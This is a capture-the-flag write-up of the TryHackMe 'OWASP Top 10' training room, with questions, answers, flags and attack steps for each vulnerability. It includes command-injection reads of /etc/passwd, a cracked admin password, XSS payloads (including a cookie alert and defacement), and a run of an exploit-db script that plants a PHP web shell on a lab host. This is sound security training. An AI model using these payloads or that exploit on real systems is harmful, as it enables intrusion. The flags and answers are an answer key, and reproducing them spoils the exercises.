Information
Room
Name: OWASP Top 10
Profile: tryhackme.com
Difficulty: Easy
Description: Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.
OWASP Top 10
Write-up
Overview
Install tools used in this WU on BlackArch Linux:
1
$ sudo pacman -S exploitdb dbeaver python
Command Injection Practical#
What strange text file is in the website root directory?
Answer: drpepper.txt
Issue the ls command to list files.
css drpepper.txt evilshell.php index.php js
How many non-root/non-service/non-daemon users are there?
Answer: 0
Issue the cat /etc/passwd command, it seems there is no non-root/non-service/non-daemon users.
1.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
2.bin:x:2:2:bin:/bin:/usr/sbin/nologin
3.sys:x:3:3:sys:/dev:/usr/sbin/nologin
4.sync:x:4:65534:sync:/bin:/bin/sync
5.games:x:5:60:games:/usr/games:/usr/sbin/nologin
6.man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
7.lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
8.mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
9.news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
10.uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
11.proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
12.www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
13.backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
14.list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
15.irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
16.gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
17.nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
18.systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
19.systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
20.syslog:x:102:106::/home/syslog:/usr/sbin/nologin
21.messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
22._apt:x:104:65534::/nonexistent:/usr/sbin/nologin
23.lxd:x:105:65534::/var/lib/lxd/:/bin/false
24.uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
25.dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
26.landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
27.pollinate:x:109:1::/var/cache/pollinate:/bin/false
28.sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
What user is this app running as?
Answer: www-data
Issue the id command.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
What is the user's shell set as?
Answer: /usr/sbin/nologin
echo $SHELL returns nothing, so let's try cat /etc/passwd | grep www-data | cut -d ':' -f 7.
/usr/sbin/nologin
What version of Ubuntu is running?
Answer: 18.04.4
Run cat /etc/os-release.
1.VERSION="18.04.4 LTS (Bionic Beaver)"
2.ID=ubuntu
3.ID_LIKE=debian
4.PRETTY_NAME="Ubuntu 18.04.4 LTS"
5.VERSION_ID="18.04"
6.HOME_URL="https://www.ubuntu.com/"
7.SUPPORT_URL="https://help.ubuntu.com/"
8.BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
9.PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
10.VERSION_CODENAME=bionic
11.UBUNTU_CODENAME=bionic
Print out the MOTD. What favorite beverage is shown?
Answer: Dr pepper
1.$ ls -1 /etc/update-motd.d/
2.10-help-text
3.50-landscape-sysinfo
4.50-motd-news
5.80-esm
6.80-livepatch
7.90-updates-available
8.91-release-upgrade
9.92-unattended-upgrades
10.95-hwe-eol
11.97-overlayroot
12.98-fsck-at-reboot
13.98-reboot-required
14.
15.$ cat /etc/update-motd.d/00-header
16.#
17.# 00-header - create the header of the MOTD
18.# Copyright (C) 2009-2010 Canonical Ltd.
19.#
20.# Authors: Dustin Kirkland <kirkland@canonical.com>
21.#
22.# This program is free software; you can redistribute it and/or modify
23.# it under the terms of the GNU General Public License as published by
24.# the Free Software Foundation; either version 2 of the License, or
25.# (at your option) any later version.
26.#
27.# This program is distributed in the hope that it will be useful,
28.# but WITHOUT ANY WARRANTY; without even the implied warranty of
29.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
30.# GNU General Public License for more details.
31.#
32.# You should have received a copy of the GNU General Public License along
33.# with this program; if not, write to the Free Software Foundation, Inc.,
34.# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
35.
36.[ -r /etc/lsb-release ] && . /etc/lsb-release
37.
38.if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
39. # Fall back to using the very slow lsb_release utility
40. DISTRIB_DESCRIPTION=$(lsb_release -s -d)
41.fi
42.
43.printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
44.
45.DR PEPPER MAKES THE WORLD TASTE BETTER!
Broken Authentication Practical
What is the flag that you found in darren's account?
Register as darren and log in.
Answer: fe86079416a21a3c99937fea8874b667
What is the flag that you found in arthur's account?
Register as arthur and log in.
Answer: d9ac0f7db4fda460ac3edeb75d75e16e
Sensitive Data Exposure (Challenge)
Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
What is the name of the mentioned directory?
Answer: /assets
Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Answer: webapp.db
Use the supporting material to access the sensitive data. What is the password hash of the admin user?
Answer: 6eea9b7ef19179a06954edd0f6c05ceb
Open the DB with dbeaver.
Crack the hash. What is the admin's plaintext password?
Answer: qwertyuiop
Crack the password with crackstation.
Login as the admin. What is the flag?
Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
XML External Entity - eXtensible Markup Language
Full form of XML
Answer: eXtensible Markup Language
Is it compulsory to have XML prolog in XML documents?
Answer: yes
Can we validate XML documents against a schema?
Answer: yes
How can we specify XML version and encoding in XML document?
Answer: XML Prolog
XML External Entity - DTD
How do you define a new ELEMENT?
Answer:!ELEMENT
How do you define a ROOT element?
Answer:!DOCTYPE
How do you define a new ENTITY?
Answer:!ENTITY
XML External Entity - Exploiting
What is the name of the user in /etc/passwd
Answer: falcon
Where is falcon's SSH key located?
Answer: /home/falcon/.ssh/id_rsa
What are the first 18 characters for falcon's private key
Answer: MIIEogIBAAKCAQEA7b
Broken Access Control (IDOR Challenge)
Look at other users notes. What is the flag?
http://10.10.125.211/note.php?note=0
Answer: flag{fivefourthree}
Security Misconfiguration
Hack into the webapp, and find the flag!
Answer: thm{4b9513968fd564a87b28aa1f9d672e17}
Cross-site Scripting
Go to http://10.10.93.135/reflected and craft a reflected XSS payload that will cause a popup saying "Hello".
Answer: ThereIsMoreToXSSThanYouThink
<script>alert("Hello")</script>
On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.
<script>alert(window.location.hostname)</script>
Answer: ReflectiveXss4TheWin
Now navigate to http://10.10.93.135/stored and make an account.
Then add a comment and see if you can insert some of your own HTML.
<b>noraj is bold</b>
Answer: HTML_T4gs
On the same page, create an alert popup box to appear on the page with your document cookies.
<script>alert(document.cookies)</script>
Answer: W3LL_D0N3_LVL2s
Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.
<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>
Answer: websites_can_be_easily_defaced_with_xss
Insecure Deserialization
Who developed the Tomcat application?
Answer: The Apache Software Foundation
What type of attack that crashes services can be performed with insecure deserialization?
Answer: denial of service
Insecure Deserialization - Objects
Select the correct term for the following statement:
Answer: A Behaviour
Insecure Deserialization - Deserialization
What is the name of the base-2 formatting that data is sent across a network as?
Answer: binary
Insecure Deserialization - Cookies
If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?
Answer: webapp.com/login
What is the acronym for the web technology that Secure cookies work over?
Answer: HTTPS
Insecure Deserialization - Cookies Practical
1st flag (cookie value)
Answer: THM{good_old_base64_huh}
1.$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d
2.}q(X sessionIdqX c7dc44838e0847b1b45544948a92d194qX
3.encodedflagqXTHM{good_old_base64_huh}qu.
2nd flag (admin dashboard)
Answer: THM{heres_the_admin_flag}
Insecure Deserialization - Remote Code Execution
flag.txt
Answer: 4a69a7ff9fd68
Components With Known Vulnerabilities - Lab
How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)
Answer: 1611
1.$ searchsploit CSE bookstore
2.------------------------------------------------------------------------------------ ---------------------------------
3. Exploit Title | Path
4.------------------------------------------------------------------------------------ ---------------------------------
5.CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting | php/webapps/48973.txt
6.CSE Bookstore 1.0 - Authentication Bypass | php/webapps/48960.txt
7.------------------------------------------------------------------------------------ ---------------------------------
8.Shellcodes: No Results
9.
10.$ searchsploit online book store
11.------------------------------------------------------------------------------------ ---------------------------------
12. Exploit Title | Path
13.------------------------------------------------------------------------------------ ---------------------------------
14.GotoCode Online Bookstore - Multiple Vulnerabilities | asp/webapps/17921.txt
15.Online Book Store 1.0 - 'bookisbn' SQL Injection | php/webapps/47922.txt
16.Online Book Store 1.0 - 'id' SQL Injection | php/webapps/48775.txt
17.Online Book Store 1.0 - Arbitrary File Upload | php/webapps/47928.txt
18.Online Book Store 1.0 - Unauthenticated Remote Code Execution | php/webapps/47887.py
19.------------------------------------------------------------------------------------ ---------------------------------
20.Shellcodes: No Results
21.
22.$ searchsploit -p 47887
23. Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution
24. URL: https://www.exploit-db.com/exploits/47887
25. Path: /usr/share/exploitdb/exploits/php/webapps/47887.py
26.File Type: ASCII text, with CRLF line terminators
27.
28.$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65
29.> Attempting to upload PHP web shell...
30.> Verifying shell upload...
31.> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php
32.> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami
33.> Do you wish to launch a shell here? (y/n): y
34.RCE $ wc -c /etc/passwd
35.1611 /etc/passwd
Insufficient Logging and Monitoring
What IP address is the attacker using?
Answer: 49.99.13.16
What kind of attack is being carried out?
Answer: brute force
Top comments (0)